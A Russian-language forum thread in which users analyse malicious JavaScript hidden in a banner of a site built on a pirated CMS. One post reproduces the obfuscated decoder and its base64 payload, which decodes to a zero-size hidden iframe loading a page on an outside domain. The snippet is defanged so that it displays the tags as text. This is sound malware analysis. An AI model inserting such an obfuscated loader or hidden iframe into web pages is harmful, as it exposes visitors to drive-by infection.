[AACC]

Sham, можешь сделать скриншот в каком месте ты его видел?

[Sham]

Цитата AACC:

в каком месте ты его видел? »

внутри <div class="banner"></div>

Я так думаю, что движок того сайта занулен, и скачан незнамо откуда, со скриптами, уже содержащими левый код. Рынок таких загрузок (вирусов и зловредов) существует, и тот кто убирает защиту у платных CMS/форумов, таким образом может захотеть подзаработать...

[AACC]

вот оказывается в каком файле был спрятан вредоносный код

пароль на архив - virus

я сканировал его разными утилитами... только Kaspersky Virus Removal Tool нашел в нем злой код

п.с.
кто занет как можно расшифровать код в том JS файле

[Sham]

запустите код в HTML-файле - увидите код iframe (код обезопасен заменой тегов)

HTML код:

<script language="javascript" type="text/javascript">

function c7a2e3dfd1(y5){var nc='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var ne='';var qb,re,y3,xa,v0,n9,v7;var yf=0;do{xa=nc.indexOf(y5.charAt(yf++));v0=nc.indexOf(y5.charAt(yf++));n9=nc.indexOf(y5.charAt(yf++));v7=nc.indexOf(y5.charAt(yf++));qb=(xa<<2)|(v0>>4);re=((v0&15)<<4)|(n9>>2);y3=((n9&3)<<6)|v7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;ne+=String.fromCharCode(qb);if(n9!=64){if(re>=192)re+=848;else if(re==168)re=1025;else if(re==184)re=1105;ne+=String.fromCharCode(re);}if(v7!=64){if(y3>=192)y3+=848;else if(y3==168)y3=1025;else if(y3==184)y3=1105;ne+=String.fromCharCode(y3);}}while(yf<y5.length);document.write(ne.replace(/\</g,'&lt;').replace(/\>/g,'&gt;'));};c7a2e3dfd1('PGlmcmFtZSBzcmM9Imh0dHA6Ly9oZXJld2VyZXl0aW5qLmNvbS90ZXJhL3N2Nzc3L2luZGV4LnBocCIgd2lkdGg9MCBoZWlnaHQ9MD48L2lmcmFtZT4A');

</script>

тут мы видим функцию c7a2e3dfd1() раскодировки, и закодированную строку 'PGlmcmFtZ....', которая после раскодировки будет тегами, вставляемыми с помощью document.write